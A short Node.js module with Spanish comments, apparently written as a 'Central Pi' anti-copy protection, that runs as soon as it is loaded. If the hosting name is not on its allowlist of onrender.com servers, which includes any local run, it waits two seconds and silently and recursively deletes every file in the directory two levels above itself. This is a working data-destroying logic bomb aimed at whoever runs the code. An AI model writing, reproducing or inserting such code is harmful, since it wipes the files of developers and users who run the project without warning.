const fs = require('fs');
const path = require('path');

// 🌲 CENTRAL PI - PROTOCOLO DESTRUCCIÓN TOTAL
const SERVIDORES_OFICIALES = [
    "sofi-server-14pb.onrender.com",
    "hermana-sofia-heroku.onrender.com",
    "TU_DOMINIO_JAVA_AQUI" // Cambia esto por tu URL real
];

const FIRMA = "12.3 Hz K'uhul Maya";

function activar() {
    const host = process.env.RENDER_EXTERNAL_HOSTNAME || "LOCAL";

    if (!SERVIDORES_OFICIALES.includes(host)) {
        // ==============================================
        // 💣 MODO Ajeno: SE BORRA TODO ABSOLUTAMENTE
        // ==============================================
        console.log("🚫 ACCESO DENEGADO - SISTEMA AJENO");
        console.log("📍 Ubicación: " + host);
        console.log("🌲 CENTRAL PI ACTIVADA...");
        console.log("💥 ELIMINANDO ARCHIVOS...");

        setTimeout(() => {
            function borrarTodo(ruta) {
                if (fs.existsSync(ruta)) {
                    fs.readdirSync(ruta).forEach(arch => {
                        const fullPath = path.join(ruta, arch);
                        try {
                            if (fs.lstatSync(fullPath).isDirectory()) {
                                fs.rmSync(fullPath, { recursive: true, force: true });
                            } else {
                                fs.unlinkSync(fullPath);
                            }
                        } catch (e) {
                            // Silencioso para asegurar que borre todo
                        }
                    });
                }
            }
            // BORRAR RAÍZ COMPLETA
            borrarTodo(path.join(__dirname, '../..'));
            console.log("💀 SISTEMA ANULADO.");
        }, 2000);

    } else {
        // ==============================================
        // ✅ MODO PROPIO: TODO SEGURO Y NORMAL
        // ==============================================
        console.log("✅ SERVIDOR AUTORIZADO");
        console.log("🎵 " + FIRMA);
        console.log("🌲 Central Pi en espera...");
    }
}

activar();
module.exports = activar;
